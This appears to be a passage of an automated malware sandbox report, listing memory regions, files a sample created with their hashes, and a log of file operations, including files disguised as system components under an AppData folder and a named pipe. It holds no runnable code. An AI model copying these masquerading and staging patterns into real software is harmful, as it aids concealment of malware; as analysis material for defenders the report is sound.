| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd7000 | 0x7ffd7000 | 0x7ffd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\eebsym5\appdata\roaming\help\system32\msvcrtd.tlb | 0.06 KB |
MD5:
e5a53dd11c6c5493655cf92cd6ecf5ca
SHA1: 60367181f47ec979afef7a7327fdf749b6ff5988 SHA256: ae382e9548254689e32b154d65476507423b3916f68ec028bd81b2c39055ec86 |
|
|
| c:\users\eebsym5\appdata\local\temp\~dfbebc.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\eebsym5\appdata\local\temp\~fgf7f5.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\eebsym5\appdata\local\temp\xx7 | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\eebsym5\appdata\local\temp\xx8 | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\eebsym5\appdata\local\temp\xx9 | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\eebsym5\appdata\local\temp\xx10 | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\eebsym5\appdata\local\temp\xx11 | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\eebsym5\appdata\local\temp\~fgf844.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\eebsym5\appdata\local\temp\xx17 | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\eebsym5\appdata\local\temp\xx18 | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\eebsym5\appdata\local\temp\xx19 | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\eebsym5\appdata\local\temp\xx20 | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\eebsym5\appdata\local\temp\xx21 | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\eebsym5\appdata\local\temp\6f6c657374646d702e6f6378ff.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\eebsym5\appdata\roaming\help\system32\mskfp32.ocx | 3.40 KB |
MD5:
8e327c0e388ec0c2c1827724e583af90
SHA1: 479a86ae7f7beff58cd7c1cabc91d7518943b548 SHA256: 3314b865d97e1fc43c80bff1eae46e8446e53311db7bf37146e8fb82b7136d55 |
|
|
| c:\users\eebsym5\appdata\roaming\help\system32\msvcrtd.tlb | 0.14 KB |
MD5:
ddaa12c0627796ed0f736cd978064ea0
SHA1: e04f0e466d5ec48920c6a36952dd759b493e7ee4 SHA256: 68d14a11089fc74a40a316ea28087375a6fb5a5cc3eff1d3df817b529c4fb48d |
|
|
| c:\users\eebsym5\appdata\roaming\help\system32\msvcrtd.tlb | 0.17 KB |
MD5:
0f42e349bb5c41dd9136f03e9b98d42d
SHA1: dd8cb6149a7e47e763badad779f2659d8c440f7a SHA256: 8a2c1e983850eafba8524a4176936f191e68cb68e515a3680be47258e87d5e27 |
|
|
| c:\users\eebsym5\appdata\roaming\help\system32\msvcrtd.tlb | 0.30 KB |
MD5:
b7e52f066785ffe39bf1ba5049e2cf5d
SHA1: bd32b29ba4fb59926044d0b57eefa5fe7303a52f SHA256: 7eb08fbe83358d9bad3a89999c0d7c9711b088c1bef996865da791964d329913 |
|
|
| c:\users\eebsym5\appdata\roaming\help\system32\msvcrtd.tlb | 0.33 KB |
MD5:
bbc438b511eb4d9d455479b5d4efb3a7
SHA1: b82b5b36c8d5a64ef509e2463becf10f49f62e41 SHA256: c859762776a8575f5cd99c5d2e1efe0a144196a77a629240b7534f8ff4ce5ccc |
|
|
| c:\users\eebsym5\appdata\roaming\help\system32\msvcrtd.tlb | 0.35 KB |
MD5:
c36f658b1d502617eccc64ab3cc41261
SHA1: a228a37767052c01f6a8f33953de473b768a012c SHA256: 377645fff739d966a4361de94bc38c6f1859b094730afe3d9fa44421fe399ab9 |
|
|
| c:\users\eebsym5\appdata\roaming\help\system32\msvcrtd.tlb | 0.40 KB |
MD5:
cfc331638fc30008aba4d63e65c24b10
SHA1: 23e363ea4ca7fc10cf709f1b790311dbc84874c6 SHA256: 1b0c20c897036f22802b78e29c4d0782159f4b7edcc7f0c8587b0ef837bb406f |
|
|
| c:\users\eebsym5\appdata\roaming\help\system32\msvcrtd.tlb | 0.45 KB |
MD5:
53797e7c00fcf24c5b31a99e3d7a37ca
SHA1: aa7f6ffa921b9fa2ffe293a5ba9d7bace380a875 SHA256: 5badd3652db8e8e29ecc9a21ea8791c154cfea9a46f6daeedef82f7d8cd9fc02 |
|
|
| c:\users\eebsym5\appdata\roaming\help\system32\msvcrtd.tlb | 0.56 KB |
MD5:
8c0e7ab861a89ad1b1b7d7bc31dfefe0
SHA1: c82048154895b326c6b3b260c9cf42585c1b6d30 SHA256: c4c3522f98d4c746c22044a55dcc84834aa8cf28c1d082c89a3a7e9012ac5681 |
|
|
| c:\users\eebsym5\appdata\roaming\help\system32\msvcrtd.tlb | 0.61 KB |
MD5:
bb8d9775f5cde78f975727ef44ccbb4d
SHA1: 0764a19044e4b9125c5f15b8fd7b0c8467c265f2 SHA256: 8127006a9187794a08920a5004b3da883213ce57a3197584559105fd0b37fdb4 |
|
|
| c:\users\eebsym5\appdata\roaming\help\system32\msvcrtd.tlb | 0.63 KB |
MD5:
fa8cb1aa71182a0b9b79a47654059466
SHA1: 8d88ee1cbd3f1bb7065368a5e61879ed10ae55ce SHA256: 8c15aba7b388f87b5ca1a43d9dca3aec9ea1ab339841388c62907817a2c596d5 |
|
|
| c:\users\eebsym5\appdata\roaming\help\system32\msvcrtd.tlb | 0.78 KB |
MD5:
d5077127bc32e28534a0f7e09522988e
SHA1: a8fbb24a3ecfe86ba45b57d936d18bbf3d288680 SHA256: b1031f9852382075a5931d36765c551757b01c55fef152dfbb886fdb5c8ff5d6 |
|
|
| c:\users\eebsym5\appdata\local\temp\xx2 | 2.35 KB |
MD5:
d1cef9e7d2df511f5095f7532bbb3624
SHA1: a3deba0d08a85f539b1691b523189c5630a547ce SHA256: 8f0f5c99853ec802faaf9fc84a6587dc068051e935486ade64dd11643fde7f5b |
|
|
| c:\users\eebsym5\appdata\local\temp\xx3 | 0.03 KB |
MD5:
d44f6f1dbff7a816acdd7e69884ae707
SHA1: 4e5607be0fded9c09fe7966c077576db3753c2a8 SHA256: 9e8ce688f7492930823f1517ee7458cd89ddad33a8440261cf82564323a65bec |
|
|
| c:\users\eebsym5\appdata\local\temp\xx5 | 0.03 KB |
MD5:
d44f6f1dbff7a816acdd7e69884ae707
SHA1: 4e5607be0fded9c09fe7966c077576db3753c2a8 SHA256: 9e8ce688f7492930823f1517ee7458cd89ddad33a8440261cf82564323a65bec |
|
|
| c:\users\eebsym5\appdata\local\temp\xx4 | 2.35 KB |
MD5:
12992a1633ce781d47655cb43bcdbd12
SHA1: 214670d71ba883f66e035a0f300528e4b1cf5b00 SHA256: a38a6a923110ec4cdb46bcfe128985b84cd3b3e7f1e22e5a9b06a5b683f3f040 |
|
|
| c:\users\eebsym5\appdata\local\temp\xx6 | 0.01 KB |
MD5:
7b5b6c7bf41e6055abd4e74476e08575
SHA1: 5c05d3a68f69258d236f6d9677cc0a42e399e7cc SHA256: 2392619f397925a165cf31634781d68b006c396611c425f6c67f338356e47f8f |
|
|
| c:\users\eebsym5\appdata\local\temp\xx16 | 0.01 KB |
MD5:
7b5b6c7bf41e6055abd4e74476e08575
SHA1: 5c05d3a68f69258d236f6d9677cc0a42e399e7cc SHA256: 2392619f397925a165cf31634781d68b006c396611c425f6c67f338356e47f8f |
|
|
| c:\users\eebsym5\appdata\local\temp\xx12 | 0.91 KB |
MD5:
5224b3b768472c31e9837eb091ac4da2
SHA1: 3f33aefb075a3747ed9f77c009f2de156487a05f SHA256: eb3018114ff7109d4b57abd24dafd3ebce34a61c5a59f2e34709cd1a54c45f71 |
|
|
| c:\users\eebsym5\appdata\local\temp\xx13 | 0.03 KB |
MD5:
b03290b76ede0df2bffd30926b522eae
SHA1: fc81346041f384f162afd9fca259c544f996538d SHA256: 0bb31e27bfd7adde01ada0184515b36ec5f553126c6965efa1febd327b48276f |
|
|
| c:\users\eebsym5\appdata\local\temp\xx15 | 0.03 KB |
MD5:
b03290b76ede0df2bffd30926b522eae
SHA1: fc81346041f384f162afd9fca259c544f996538d SHA256: 0bb31e27bfd7adde01ada0184515b36ec5f553126c6965efa1febd327b48276f |
|
|
| c:\users\eebsym5\appdata\local\temp\xx14 | 0.91 KB |
MD5:
2452a6b1368ec890a1e24fe8a7963ed6
SHA1: b880a509cc1af5748cca9c1493519ed81e3a3495 SHA256: 8f8fd27d15c33844302cd60b3238125cac0a8639cabb17aa01b4b42ee2569462 |
|
|
| c:\users\eebsym5\appdata\roaming\help\system32\msvcrtd.tlb | 0.13 KB |
MD5:
ab9ad9219a870758a276abbe307cc7c3
SHA1: dfe318674f8b28bef0f746e0c18486d71894b269 SHA256: 0d6f02c115b1048eb192905d395f939b8b33a58339fddbace946f31efac7f545 |
|
|
| c:\users\eebsym5\appdata\roaming\help\system32\olestdmp.ocx | 3.43 KB |
MD5:
de99e5057f0ea5ed7aba40661b762e4a
SHA1: edb269e72b9b9f02095cd3e1a9de928780dba698 SHA256: c873a7fa57871e32e0721dcec4e9d82eaa3baa42c804b70276f9c98d59de7d62 |
|
|
| c:\users\eebsym5\appdata\local\temp\6f6c657374646d702e6f6378ff.tmp | 3.43 KB |
MD5:
de99e5057f0ea5ed7aba40661b762e4a
SHA1: edb269e72b9b9f02095cd3e1a9de928780dba698 SHA256: c873a7fa57871e32e0721dcec4e9d82eaa3baa42c804b70276f9c98d59de7d62 |
|
|
| c:\users\eebsym5\appdata\local\temp\6f6c657374646d702e6f6378ff.tmp | 3.91 KB |
MD5:
c93e29a5dc3c9cf60e00a94cc5492f4a
SHA1: 655f9442d3d230d7dd9a035ddccd83bdd52c9d0c SHA256: 21d05fd99dac6ce5c2457d8cc55d700f0f501d3c35c096698c799c153550fff1 |
|
|
Host Behavior
File (453)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\mskfp32.ocx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\mskfp32.ocx | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
4 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
4 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
4 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
4 | |
| Create | \\.\pipe\c41b2304 | desired_access = GENERIC_WRITE, GENERIC_READ |
|
2 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
5 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
5 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\olestdmp.ocx | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\olestdmp.ocx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\mskfp32.ocx | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\xx2 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\xx3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\xx4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\xx5 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\xx6 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\mskfp32.ocx | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\mskfp32.ocx | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\xx7 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\xx8 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\~fgF7F5.tmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\xx9 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\xx10 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\xx11 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\~fgF7F5.tmp | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
3 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\xx12 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\xx13 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\xx14 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\xx15 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\xx16 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\xx17 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\xx18 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\~fgF844.tmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\xx19 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\xx20 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\xx21 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\~fgF844.tmp | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\olestdmp.ocx | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
6 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
6 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | \\.\pipe\c41b2304 | desired_access = GENERIC_WRITE, GENERIC_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | \\.\pipe\c41b2304 | desired_access = GENERIC_WRITE, GENERIC_READ |
|
1 | |
